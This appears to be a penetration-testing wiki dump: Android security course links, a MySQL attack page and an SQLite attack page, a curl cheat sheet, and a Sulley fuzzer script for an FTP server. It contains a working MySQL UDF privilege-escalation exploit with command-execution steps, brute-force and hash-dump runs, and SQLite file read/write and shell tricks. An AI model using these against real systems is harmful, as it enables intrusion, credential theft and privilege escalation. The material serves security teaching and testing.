leakage](http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/) 11 | 5. [debugging java applications using jdb](http://resources.infosecinstitute.com/android-hacking-security-part-5-debugging-java-applications-using-jdb/) 12 | 6. [exploiting debuggable android applications](http://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/) 13 | 7. [attacks android webviews](http://resources.infosecinstitute.com/android-hacking-security-part-7-attacks-android-webviews/) 14 | 8. [root detection evasion](http://resources.infosecinstitute.com/android-hacking-security-part-8-root-detection-evasion/) 15 | 9. [insecure local storage shared preferences](http://resources.infosecinstitute.com/android-hacking-security-part-9-insecure-local-storage-shared-preferences/) 16 | 10. [insecure local storage](http://resources.infosecinstitute.com/android-hacking-security-part-10-insecure-local-storage/) 17 | 11. [blackbox assessments introspy](http://resources.infosecinstitute.com/android-hacking-security-part-11-blackbox-assessments-introspy/) 18 | 12. [securing shared preferences third party libraries](http://resources.infosecinstitute.com/android-hacking-security-part-12-securing-shared-preferences-third-party-libraries/) 19 | 13. [introduction drozer](http://resources.infosecinstitute.com/android-hacking-security-part-13-introduction-drozer/) 20 | 14. [examining android app specific data non rooted devices](http://resources.infosecinstitute.com/android-hacking-security-part-14-examining-android-app-specific-data-non-rooted-devices/) 21 | 15. [hacking android apps using backup techniques](http://resources.infosecinstitute.com/android-hacking-security-part-15-hacking-android-apps-using-backup-techniques/) 22 | 16. [broken cryptography](http://resources.infosecinstitute.com/android-hacking-security-part-16-broken-cryptography/) 23 | 17. [cracking android app binaries](http://resources.infosecinstitute.com/android-hacking-security-part-17-cracking-android-app-binaries/) 24 | 18. [introduction to reverse engineering](http://resources.infosecinstitute.com/android-hacking-and-security-part-18-introduction-to-reverse-engineering/) 25 | 19. [insecure data storage with nosql databases](http://resources.infosecinstitute.com/android-hacking-and-security-part-19-insecure-data-storage-with-nosql-databases/) 26 | 20. [debugging apps on android emulator using gdb](http://resources.infosecinstitute.com/android-hacking-and-security-part-20-debugging-apps-on-android-emulator-using-gdb/) 27 | 28 | ## Android reverse engineering 29 | 30 | 1. http://www.fasteque.com/android-reverse-engineering-101-part-1/ 31 | 2. http://www.fasteque.com/android-reverse-engineering-101-part-2/ 32 | 3. http://www.fasteque.com/android-reverse-engineering-101-part-3/ 33 | 4. http://www.fasteque.com/android-reverse-engineering-101-part-4/ 34 | 5. http://www.fasteque.com/android-reverse-engineering-101-part-5/ 35 | 36 | 37 | ## [Android Security and Exploitation for Pentesters](http://www.pentesteracademy.com/course?id=24) 38 | 39 | 00. introduction 40 | 01. Android-Security-Introduction 41 | 02. Android-Architecture 42 | 03. Android-Permissions 43 | 04. Android-Applications 44 | 05. Setting-up-Genymotion 45 | 06. Android-Application-Components 46 | 07. Dex-Analysis 47 | 08. Android-Debug-Bridge 48 | 09. Logging-based-vulnerabilities 49 | 10. Application-Reversing 50 | 11. Analyzing-Android-Malwares 51 | 12. Traffic-Analysis 52 | 13. SSL-Pinning 53 | 14. Leaking-Content-Providers 54 | 15. Drozer-Kung-Fu 55 | 16. Read-Based-Content-Provider-Vulnerability 56 | 17. Advanced-Drozer-Kung-Fu 57 | 18. Drozer-Scripting 58 | 19. Dropbox-Vulnerability 59 | 20. Backup-based-vulnerabilities 60 | 21. Client-Side-Injection 61 | 22. Hooking-Introduction-and-Setting-up-InsecureBankSetup 62 | 23. Android-Debugging-with-Andbug 63 | 24. Debugging-with-JDB 64 | 25. Automated-Hooking-with-Introspy 65 | 26. Cydia-Substrate 66 | 27. Hooking-using-Xposed 67 | 28. Androguard-Scripting-and-Analysis 68 | 29. Webview-based-vulnerabilities 69 | 30. Exploiting-Webviews-with-Metasploit 70 | 71 | ## Books 72 | 73 | 1. Android Security Cookbook 74 | 2. Android Hacker's Handbook 75 | 3. Learning Pentesting for Android Devices 76 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB Pentesting for Absolute Beginners.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB Pentesting for Absolute Beginners.pdf -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB_Lab.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/2.Vulnerability-Assessment/Database-Assessment/mongodb/MongoDB_Lab.zip -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/mysql/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Mysql Hacking 6 | 7 | |**Command**|**Description**| 8 | |:----------|:--------------| 9 | |select @@version|Show mysql server version| 10 | |select version()|Show mysql server version| 11 | |SHOW STATUS|Show mysql server status information| 12 | |show VARIABLES|Show all mysql server variables| 13 | |select user()|Query current database user| 14 | |SHOW VARIABLES LIKE '%datadir%'|Show all variables which include datadir string| 15 | |select load_file('/etc/passwd');|Load file into database| 16 | |select 0xnnnnnn... INTO **OUTFILE** '/path/to/filename'|Write data into a text file.| 17 | |select 0xnnnnnn... INTO **DUMPFILE** '/path/to/filename'|Write data into a binary file.| 18 | 19 | ## How to install mysql server ? 20 | 21 | Lab: ubuntu / debian 22 | 23 | ``` 24 | $ sudo apt-get install mysql-server 25 | $ sudo systemctl start service 26 | ``` 27 | 28 | Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`, and change the **bind-address**. 29 | 30 | ``` 31 | bind-address = 0.0.0.0 32 | ``` 33 | 34 | ## Allow remote access 35 | 36 | ``` 37 | root@sh:~# ss -ant | grep ":3306" 38 | LISTEN 0 80 *:3306 *:* 39 | root@sh:~# mysql -h 10.0.250.71 -uroot -p 40 | Enter password: 41 | ERROR 1130 (HY000): Host '10.0.250.71' is not allowed to connect to this MySQL server 42 | ``` 43 | 44 | Create a sql file called **adduser.sql**, and execute the command: `mysql -h 127.0.0.1 -u root -p mysql < adduser.sql` 45 | 46 | ``` 47 | CREATE USER 'mysqlsec'@'localhost' IDENTIFIED BY 'password'; 48 | GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'localhost' WITH GRANT OPTION; 49 | CREATE USER 'mysqlsec'@'%' IDENTIFIED BY 'password'; 50 | GRANT ALL PRIVILEGES ON *.* TO 'mysqlsec'@'%' WITH GRANT OPTION; 51 | ``` 52 | 53 | If successful, you can access the mysql server remotely. 54 | 55 | ``` 56 | root@sh:~# mysql -h 10.0.250.71 -u mysqlsec -p mysql 57 | Enter password: 58 | Reading table information for completion of table and column names 59 | You can turn off this feature to get a quicker startup with -A 60 | 61 | Welcome to the MySQL monitor. Commands end with ; or \g. 62 | Your MySQL connection id is 8 63 | Server version: 5.6.30-1 (Debian) 64 | 65 | Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. 66 | 67 | Oracle is a registered trademark of Oracle Corporation and/or its 68 | affiliates. Other names may be trademarks of their respective 69 | owners. 70 | 71 | Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 72 | 73 | mysql> 74 | mysql> select Host,User,Password from `mysql`.`user` where User='mysqlsec'; 75 | +-----------+----------+-------------------------------------------+ 76 | | Host | User | Password | 77 | +-----------+----------+-------------------------------------------+ 78 | | localhost | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 79 | | % | mysqlsec | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 80 | +-----------+----------+-------------------------------------------+ 81 | 2 rows in set (0.00 sec) 82 | ``` 83 | 84 | ## How to crack mysql ? 85 | 86 | ``` 87 | msf auxiliary(mysql_login) > show options 88 | 89 | Module options (auxiliary/scanner/mysql/mysql_login): 90 | 91 | Name Current Setting Required Description 92 | ---- --------------- -------- ----------- 93 | BLANK_PASSWORDS false no Try blank passwords for all users 94 | BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 95 | DB_ALL_CREDS false no Try each user/password couple stored in the current database 96 | DB_ALL_PASS false no Add all passwords in the current database to the list 97 | DB_ALL_USERS false no Add all users in the current database to the list 98 | PASSWORD no A specific password to authenticate with 99 | PASS_FILE /tmp/pass.txt no File containing passwords, one per line 100 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 101 | RHOSTS 10.0.250.71 yes The target address range or CIDR identifier 102 | RPORT 3306 yes The target port 103 | STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host 104 | THREADS 10 yes The number of concurrent threads 105 | USERNAME mysqlsec no A specific username to authenticate as 106 | USERPASS_FILE no File containing users and passwords separated by space, one pair per line 107 | USER_AS_PASS false no Try the username as the password for all users 108 | USER_FILE no File containing usernames, one per line 109 | VERBOSE true yes Whether to print output for all attempts 110 | 111 | msf auxiliary(mysql_login) > run 112 | 113 | [*] 10.0.250.71:3306 - 10.0.250.71:3306 - Found remote MySQL version 5.6.30 114 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:AzVJmX (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 115 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:j1Uyj3 (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 116 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:root (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 117 | [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:mysql (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) 118 | [+] 10.0.250.71:3306 - MYSQL - Success: 'mysqlsec:password' 119 | [*] Scanned 1 of 1 hosts (100% complete) 120 | [*] Auxiliary module execution completed 121 | ``` 122 | 123 | ## How to dump mysql hash ? 124 | 125 | ``` 126 | msf auxiliary(mysql_hashdump) > show options 127 | 128 | Module options (auxiliary/scanner/mysql/mysql_hashdump): 129 | 130 | Name Current Setting Required Description 131 | ---- --------------- -------- ----------- 132 | PASSWORD password no The password for the specified username 133 | RHOSTS 10.0.250.71 yes The target address range or CIDR identifier 134 | RPORT 3306 yes The target port 135 | THREADS 1 yes The number of concurrent threads 136 | USERNAME mysqlsec no The username to authenticate as 137 | 138 | msf auxiliary(mysql_hashdump) > run 139 | 140 | [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 141 | [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 142 | [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 143 | [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 144 | [+] 10.0.250.71:3306 - Saving HashString as Loot: debian-sys-maint:*8E970943FBFAA7CF6A11A55677E8050B725D9919 145 | [+] 10.0.250.71:3306 - Saving HashString as Loot: phpmyadmin:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 146 | [+] 10.0.250.71:3306 - Saving HashString as Loot: freepbxuser:*433D16EECA646A6CCF8F024AD8CDDC070C6791C1 147 | [+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 148 | [+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 149 | [*] Scanned 1 of 1 hosts (100% complete) 150 | [*] Auxiliary module execution completed 151 | ``` 152 | 153 | ## UDF Privilege Escalation 154 | 155 | ``` 156 | #include 157 | #include 158 | 159 | enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; 160 | 161 | typedef struct st_udf_args { 162 | unsigned int arg_count; // number of arguments 163 | enum Item_result *arg_type; // pointer to item_result 164 | char **args; // pointer to arguments 165 | unsigned long *lengths; // length of string args 166 | char *maybe_null; // 1 for maybe_null args 167 | } UDF_ARGS; 168 | 169 | typedef struct st_udf_init { 170 | char maybe_null; // 1 if func can return NULL 171 | unsigned int decimals; // for real functions 172 | unsigned long max_length; // for string functions 173 | char *ptr; // free ptr for func data 174 | char const_item; // 0 if result is constant 175 | } UDF_INIT; 176 | 177 | int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) 178 | { 179 | if (args->arg_count != 1) 180 | return(0); 181 | 182 | system(args->args[0]); 183 | 184 | return(0); 185 | } 186 | 187 | char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message) 188 | { 189 | return(0); 190 | } 191 | ``` 192 | 193 | ``` 194 | $ gcc -g -c raptor_udf2.c 195 | $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 196 | ``` 197 | 198 | Compile the above code into a so library file. Next, please translate the so as a hex string: 199 | 200 | ``` 201 | #!/usr/bin/python 202 | # -*- coding: utf8 -*- 203 | 204 | # https://www.exploit-db.com/exploits/1518/ 205 | 206 | # How to upload UDF DLL into mysql server ? 207 | # show VARIABLES; 208 | # select @@plugin_dir; 209 | # SELECT CHAR (...) INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' 210 | # SELECT 0xnnnnn INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' 211 | # drop function if exists do_system 212 | # create function do_system returns integer soname 'lib_mysqludf_sys.so'; 213 | # select sys_exec('id'); 214 | 215 | # How to Compile UDF Dll ? 216 | # gcc -g -c raptor_udf2.c 217 | # gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 218 | 219 | import sys 220 | import binascii 221 | 222 | 223 | def convert(filename): 224 | with open(filename) as f: 225 | print(binascii.hexlify(f.read())) 226 | 227 | 228 | if __name__ == '__main__': 229 | if len(sys.argv) != 2: 230 | print("python {} /path/to/lib_mysqludf_sys.so".format(sys.argv[0])) 231 | else: 232 | convert(sys.argv[1]) 233 | ``` 234 | 235 | Please try to upload so file, and Using MySQL User Defined Functions called **do_system**. 236 | 237 | ``` 238 | mysql > select @@plugin_dir; 239 | mysql > SELECT 0x7f45........0000 INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' 240 | mysql > drop function if exists do_system 241 | mysql > create function do_system returns integer soname 'lib_mysqludf_sys.so'; 242 | mysql > select do_system('id > /tmp/result.log'); 243 | mysql > select load_file('/tmp/result.log'); 244 | ``` 245 | 246 | ## Mof Privilege Escalation 247 | 248 | If mysql is on windows, please try: 249 | 250 | ``` 251 | msf > 252 | use exploit/windows/mysql/mysql_mof 253 | use exploit/windows/mysql/mysql_start_up 254 | use exploit/windows/mysql/scrutinizer_upload_exec 255 | use exploit/windows/mysql/mysql_payload 256 | use exploit/windows/mysql/mysql_yassl_hello 257 | ``` 258 | 259 | If enough privilege, you can also write data into os files (boot, cron, and so on). 260 | 261 | # Links 262 | 263 | 1. http://www.mysqltutorial.org/mysql-cheat-sheet.aspx 264 | 2. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet 265 | 3. https://www.rapid7.com/db/modules/exploit/windows/mysql/mysql_mof 266 | 4. http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html 267 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/sqlite/curl_hacking.md: -------------------------------------------------------------------------------- 1 | #CURL# 2 | 3 | ---- 4 | 5 | ##GENERAL## 6 | 7 | ``` 8 | curl http://curl.haxx.se 9 | curl http://site.{one,two,three}.com 10 | curl ftp://ftp.numericals.com/file[1-100].txt 11 | curl ftp://ftp.numericals.com/file[001-100].txt 12 | curl ftp://ftp.letters.com/file[a-z].txt 13 | 14 | curl http://any.org/archive[1996-1999]/vol[1-4]/part{a,b,c}.html 15 | 16 | curl http://www.numericals.com/file[1-100:10].txt 17 | curl http://www.letters.com/file[a-z:2].txt 18 | 19 | curl -o index.html http://curl.haxx.se/ 20 | curl http://curl.haxx.se/ > index.html 21 | 22 | curl -# http://curl.haxx.se/ > index.html 23 | 24 | curl -0 http://curl.haxx.se/ 25 | curl --http1.1 http://curl.haxx.se/ 26 | curl --http2 http://curl.haxx.se/ 27 | 28 | curl -1 http://curl.haxx.se/ 29 | curl --tlsv1 http://curl.haxx.se/ 30 | 31 | curl -2 http://curl.haxx.se/ 32 | curl --sslv2 http://curl.haxx.se/ 33 | 34 | curl -3 http://curl.haxx.se/ 35 | curl --sslv3 http://curl.haxx.se/ 36 | 37 | curl -4 http://curl.haxx.se/ 38 | curl --ipv4 http://curl.haxx.se/ 39 | 40 | curl -6 http://curl.haxx.se/ 41 | curl --ipv6 http://curl.haxx.se/ 42 | 43 | curl -A "wget/1.0" http://curl.haxx.se/ 44 | curl --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" [URL] 45 | curl --user-agent "Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" [URL] 46 | 47 | curl -b "phpsession=Testtest" http://demo.com/ 48 | curl --cookie "name=Daniel" http://curl.haxx.se 49 | 50 | curl -c cookies.txt http://curl.haxx.se/ 51 | curl --cookie-jar cookies.txt http://curl.haxx.se 52 | 53 | curl -d "username=admin&password=pass" http://curl.haxx.se/ 54 | curl --data "birthyear=1905&press=%20OK%20" http://curl.haxx.se/when.cgi 55 | curl --data-urlencode "name=I am Daniel" http://curl.haxx.se 56 | curl --data "" --header "Content-Type: text/xml" --request PROPFIND url.com 57 | 58 | curl -e "http://referer" http://demo.com/ 59 | curl --referer http://curl.haxx.see http://curl.haxx.se 60 | 61 | curl --header "Host:" http://curl.haxx.se 62 | curl --header "Destination: http://nowhere" http://curl.haxx.se 63 | 64 | curl -D - http://curl.haxx.se/ 65 | curl --dump-header headers_and_cookies http://curl.haxx.se 66 | 67 | curl -L http://github.com/ 68 | curl --location http://curl.haxx.se 69 | 70 | curl --dns-servers 8.8.8.8 http://demo.com/ 71 | 72 | curl --trace-ascii debugdump.txt http://curl.haxx.se/ 73 | curl --form upload=@localfilename --form press=OK [URL] 74 | curl --upload-file uploadfile http://curl.haxx.se/receive.cgi 75 | curl --user name:password http://curl.haxx.se 76 | curl --proxy-user proxyuser:proxypassword curl.haxx.se 77 | 78 | curl --cert mycert.pem https://secure.example.com 79 | ``` 80 | 81 | ---- 82 | 83 | #REFERENCES# 84 | 85 | $ man curl 86 | http://curl.haxx.se/docs/manual.html 87 | http://curl.haxx.se/docs/httpscripting.html 88 | http://httpkit.com/resources/HTTP-from-the-Command-Line/ 89 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Database-Assessment/sqlite/sqlite_hacking.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | #SQLITE HACKING# 6 | 7 | ---- 8 | 9 | ##CONNECT TO DATABASE## 10 | 11 | Let's start with typing a simple sqlite3 command at command prompt which will provide you SQLite command prompt where you will issue various SQLite commands. 12 | 13 | ``` 14 | ┌─[lab@core]─[~/share/pentestlab/Darknet] 15 | └──╼ sqlite3 temp.db 16 | SQLite version 3.8.10.2 2015-05-20 18:17:19 17 | Enter ".help" for usage hints. 18 | sqlite> .help 19 | .backup ?DB? FILE Backup DB (default "main") to FILE 20 | .bail on|off Stop after hitting an error. Default OFF 21 | .binary on|off Turn binary output on or off. Default OFF 22 | .clone NEWDB Clone data into NEWDB from the existing database 23 | .databases List names and files of attached databases 24 | .dbinfo ?DB? Show status information about the database 25 | .dump ?TABLE? ... Dump the database in an SQL text format 26 | If TABLE specified, only dump tables matching 27 | LIKE pattern TABLE. 28 | .echo on|off Turn command echo on or off 29 | .eqp on|off Enable or disable automatic EXPLAIN QUERY PLAN 30 | .exit Exit this program 31 | .explain ?on|off? Turn output mode suitable for EXPLAIN on or off. 32 | With no args, it turns EXPLAIN on. 33 | .fullschema Show schema and the content of sqlite_stat tables 34 | .headers on|off Turn display of headers on or off 35 | .help Show this message 36 | .import FILE TABLE Import data from FILE into TABLE 37 | .indexes ?TABLE? Show names of all indexes 38 | If TABLE specified, only show indexes for tables 39 | matching LIKE pattern TABLE. 40 | .limit ?LIMIT? ?VAL? Display or change the value of an SQLITE_LIMIT 41 | .load FILE ?ENTRY? Load an extension library 42 | .log FILE|off Turn logging on or off. FILE can be stderr/stdout 43 | .mode MODE ?TABLE? Set output mode where MODE is one of: 44 | ascii Columns/rows delimited by 0x1F and 0x1E 45 | csv Comma-separated values 46 | column Left-aligned columns. (See .width) 47 | html HTML code 48 | insert SQL insert statements for TABLE 49 | line One value per line 50 | list Values delimited by .separator strings 51 | tabs Tab-separated values 52 | tcl TCL list elements 53 | .nullvalue STRING Use STRING in place of NULL values 54 | .once FILENAME Output for the next SQL command only to FILENAME 55 | .open ?FILENAME? Close existing database and reopen FILENAME 56 | .output ?FILENAME? Send output to FILENAME or stdout 57 | .print STRING... Print literal STRING 58 | .prompt MAIN CONTINUE Replace the standard prompts 59 | .quit Exit this program 60 | .read FILENAME Execute SQL in FILENAME 61 | .restore ?DB? FILE Restore content of DB (default "main") from FILE 62 | .save FILE Write in-memory database into FILE 63 | .scanstats on|off Turn sqlite3_stmt_scanstatus() metrics on or off 64 | .schema ?TABLE? Show the CREATE statements 65 | If TABLE specified, only show tables matching 66 | LIKE pattern TABLE. 67 | .separator COL ?ROW? Change the column separator and optionally the row 68 | separator for both the output mode and .import 69 | .shell CMD ARGS... Run CMD ARGS... in a system shell 70 | .show Show the current values for various settings 71 | .stats on|off Turn stats on or off 72 | .system CMD ARGS... Run CMD ARGS... in a system shell 73 | .tables ?TABLE? List names of tables 74 | If TABLE specified, only list tables matching 75 | LIKE pattern TABLE. 76 | .timeout MS Try opening locked tables for MS milliseconds 77 | .timer on|off Turn SQL timer on or off 78 | .trace FILE|off Output each SQL statement as it is run 79 | .vfsname ?AUX? Print the name of the VFS stack 80 | .width NUM1 NUM2 ... Set column widths for "column" mode 81 | Negative values right-justify 82 | 83 | 84 | ``` 85 | 86 | ---- 87 | 88 | ##GENERATE## 89 | 90 | Common sqlite features (comments, concate, substr, hex, quote, .... ) 91 | 92 | ``` 93 | sqlite> select 1; -- comments 94 | 1 95 | sqlite> select 'hello ' || 'world'; 96 | hello world 97 | sqlite> select substr('hello world', 1, 3); 98 | hel 99 | sqlite> select hex('a'); 100 | 61 101 | sqlite> select quote(hex('a')); 102 | '61' 103 | sqlite> PRAGMA database_list; 104 | 0|main|/tmp/evil.php 105 | 2|pwn|/tmp/evil.php 106 | sqlite> PRAGMA temp_store_directory = '/tmp'; 107 | sqlite> 108 | 109 | ``` 110 | 111 | ---- 112 | 113 | ##READ FILE## 114 | 115 | ``` 116 | sqlite> 117 | sqlite> CREATE TABLE pwn.data (data TEXT); 118 | sqlite> .tables 119 | data pwn.data 120 | sqlite> .import /etc/passwd data 121 | sqlite> select * from data; 122 | root:x:0:0:root:/root:/bin/bash 123 | bin:x:1:1:bin:/bin:/usr/bin/nologin 124 | ...... 125 | ...... 126 | sqlite> .tables 127 | data pwn.data pwn.shell shell 128 | sqlite> DROP TABLE pwn.shell; 129 | ``` 130 | 131 | 132 | ---- 133 | 134 | ##WRITE FILE## 135 | 136 | ``` 137 | sqlite> ATTACH DATABASE '/tmp/evil.php' as pwn; 138 | sqlite> CREATE TABLE pwn.shell (code TEXT); 139 | sqlite> INSERT INTO pwn.shell (code) VALUES (''); 140 | sqlite> .quit 141 | ┌─[✗]─[lab@core]─[~/share/pentestlab/Darknet] 142 | └──╼ file /tmp/evil.php 143 | /tmp/evil.php: SQLite 3.x database 144 | ┌─[lab@core]─[~/share/pentestlab/Darknet] 145 | └──╼ strings /tmp/evil.php 146 | SQLite format 3 147 | Itableshellshell 148 | CREATE TABLE shell (code TEXT) 149 | 1 150 | ``` 151 | 152 | ---- 153 | 154 | ##COMMAND EXECUTION## 155 | 156 | ``` 157 | sqlite> .shell id 158 | uid=1000(lab) gid=1000(lab) groups=1000(lab) 159 | sqlite> .system id 160 | uid=1000(lab) gid=1000(lab) groups=1000(lab) 161 | 162 | ``` 163 | 164 | ---- 165 | 166 | #REFERENCES# 167 | 168 | http://www.tutorialspoint.com/sqlite/ 169 | http://atta.cked.me/home/sqlite3injectioncheatsheet 170 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Network-Assessment/Fuzzers/sulley/fuzz_PCManftpd32.py: -------------------------------------------------------------------------------- 1 | # Video 1 Practical Fuzzing Basic using the Sulley Framework 2 | # http://www.dfate.de/public/index.php/post/exploit-development-series-video-1-practical-fuzzing-basics-using-the-sulley-framework 3 | # https://www.exploit-db.com/exploits/37731/ 4 | 5 | # ------------------------------------------------------------------- 6 | # Usage: 7 | # C:\Fuzzing\sulley>python network_monitor.py -d 0 -f "port 21" -P audit 8 | # C:\Fuzzing\sulley>python process_monitor.py -c audit\pcmanftpd_crashbin -p "PCManFTPD2.exe" 9 | 10 | # ------------------------------------------------------------------- 11 | # Analysis: 12 | 13 | """ 14 | 220 PCMan's FTP Server 2.0 Ready. 15 | USER anonymous 16 | 331 User name okay, need password. 17 | PASS password12345 18 | 230 User logged in 19 | PORT 192,168,1,106,206,27 20 | 200 Command okay. 21 | STOR demo2.txt 22 | 150 File status okay; Open data connection. 23 | 226 Data Sent okay. 24 | PORT 192,168,1,106,206,28 25 | 200 Command okay. 26 | LIST 27 | 150 File status okay; Open data connection. 28 | 226 Data Sent okay. 29 | PORT 192,168,1,106,206,29 30 | 200 Command okay. 31 | RETR demo2.txt 32 | 150 File status okay; Open data connection. 33 | 226 Data Sent okay. 34 | QUIT 35 | """ 36 | 37 | from sulley import * 38 | 39 | # General Overview 40 | # 1. Create requests (define fuzzing grammar) 41 | # 2. Define sessions 42 | # 3. Define target 43 | # 4. Fuzz! 44 | 45 | # s_initialize - Construct a new request 46 | # s_static ("USER") - A string that is static (umutated) and does not get fuzzed 47 | # s_delin(" ") - A delimiter that can be fuzzed. Will have different mutations that using s_string 48 | # s_string("anonymous") - A string that will be mutated. Includes more mutations than s_delim 49 | 50 | # ------------------------------------------------------------------- 51 | # Grammar to be tested 52 | s_initialize("user") 53 | s_static("USER") 54 | s_delim(" ", fuzzable=False) 55 | s_string("anonymous") 56 | s_static("\r\n") 57 | 58 | s_initialize("pass") 59 | s_static("PASS") 60 | s_delim(" ", fuzzable=False) 61 | s_string("pass12345") 62 | s_static("\r\n") 63 | 64 | s_initialize("put") 65 | s_static("PUT") 66 | s_delim(" ", fuzzable=False) 67 | s_string("fuzz_strings") 68 | s_static("\r\n") 69 | 70 | s_initialize("stor") 71 | s_static("STOR") 72 | s_delim(" ", fuzzable=True) 73 | s_string("AAAA") 74 | s_static("\r\n") 75 | 76 | s_initialize("mkd") 77 | s_static("MKD") 78 | s_delim(" ", fuzzable=False) 79 | s_string("AAAA") 80 | s_static("\r\n") 81 | 82 | # ------------------------------------------------------------------- 83 | # Define pre_send function. Will be executed right after the three-way handshake 84 | def receive_ftp_banner(sock): 85 | data = sock.recv(1024) 86 | print(data) 87 | 88 | # ------------------------------------------------------------------- 89 | # Define session 90 | # Session parameters 91 | SESSION_FILENAME = "pcmanftpd-session" # Keeps track of the current fuzzing state 92 | SLEEP_TIME = 0.5 # Pause between two fuzzing attempts 93 | TIMEOUT = 5 # Fuzzer will time out after 5 seconds of no connection 94 | CRASH_THRESHOLD = 4 # After 4 crashes parameter will be skipped 95 | 96 | mysession = sessions.session( 97 | session_filename=SESSION_FILENAME, 98 | sleep_time=SLEEP_TIME, 99 | timeout=TIMEOUT, 100 | crash_threshold=CRASH_THRESHOLD) 101 | 102 | mysession.pre_send = receive_ftp_banner 103 | mysession.connect(s_get("user")) 104 | mysession.connect(s_get("user"), s_get("pass")) 105 | mysession.connect(s_get("pass"), s_get("stor")) 106 | mysession.connect(s_get("pass"), s_get("mkd")) 107 | mysession.connect(s_get("pass"), s_get("put")) 108 | 109 | # ------------------------------------------------------------------- 110 | # Draw graph representing the fuzzing paths. 111 | with open("session_test.udg", "w+") as f: 112 | f.write(mysession.render_graph_udraw()) 113 | 114 | # ------------------------------------------------------------------- 115 | # Just some overview output 116 | 117 | print("Number of mutation during one case: %s\n" % str(s_num_mutations())) 118 | print("Total number of mutations: %s\n" % str(s_num_mutations() * 5)) 119 | 120 | decision = raw_input("Do you want to continue?(y/n): ") 121 | if decision == "n": 122 | exit() 123 | 124 | # ------------------------------------------------------------------- 125 | # Define target paramsters 126 | host = "192.168.1.107" 127 | ftp_port = 21 128 | netmon_port = 26001 129 | procmon_port = 26002 130 | target = sessions.target(host, ftp_port) 131 | target.procmon = pedrpc.client(host, procmon_port) 132 | target.netmon = pedrpc.client(host, netmon_port) 133 | 134 | target.procmon_options = { 135 | "proc_name": "pcmanftpd2.exe", 136 | "stop_commands": ["wmic process where (name='PCManFTPD2.exe') call terminate"], 137 | "start_commands": ["C:\\PCManFTP\\PCManFTPD2.exe"] 138 | } 139 | 140 | # Add target to the session 141 | mysession.add_target(target) 142 | 143 | # ------------------------------------------------------------------- 144 | # Lets get rollin 145 | 146 | print("Starting fuzzing now") 147 | mysession.fuzz() 148 | 149 | # Starts the fuzzing process and 150 | # also the web interface (http://127.0.0.1:26000) to see the current state 151 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Network-Assessment/Jenkins/Jenkins_hacking.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | 4 | # 